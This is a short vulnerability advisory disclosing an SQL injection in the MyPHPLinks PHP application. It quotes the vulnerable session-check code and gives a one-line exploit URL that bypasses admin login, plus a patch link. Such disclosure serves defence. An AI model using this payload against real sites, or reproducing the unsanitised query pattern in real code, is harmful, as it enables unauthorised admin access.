MyPHPLinks (PHP) : SQL Injection

["Frog Man" <leseulfrog () hotmail com>]

Informations :
°°°°°°°°°°°°°°
Website : http://www.myphpsoft.net
Version : ? -> 2.1.9, 2.2.0CVS
Problem : SQL Injection -> Admin access

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
admin/auth/checksession.php
---------------------------------------------------------------
[...]
if($idsession!=''){
$dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser, 
$MyPHPLinksPass);
if(!$dbs->connect())
 die($dbs->error);
if(!$dbs->query("select count(*) as nb from ".$MyPHPLinksTBAuth." where 
session='".$idsession."' and timesession > now()"))
 die($dbs->error);
while($dbs->nextrecord()){
 $loginauth = $dbs->valeur("nb");
}
if ($loginauth==0){
 header("Location:$MyPHPLinksAuthPErrDef");exit;
}else{
 if(!$dbs->query("UPDATE ".$MyPHPLinksTBAuth." set 
timesession=now()+".$MyPHPLinksTLSession." where session='".$idsession."'"))
  die($dbs->error);
}
}else{
header("Location:$MyPHPLinksAuthPErrDef");exit;
}
?>
---------------------------------------------------------------


Exploit :
°°°°°°°°°
http://[target]/admin/index.php?idsession='%20OR%20''='


Patch :
°°°°°°°
A patch can be downloaded on 
http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=m .

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/MyPhpLinks.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n


_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! 
http://search.msn.fr/worldwide.asp